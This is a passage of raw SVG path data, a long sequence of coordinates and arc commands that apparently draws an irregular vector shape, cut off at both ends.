.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-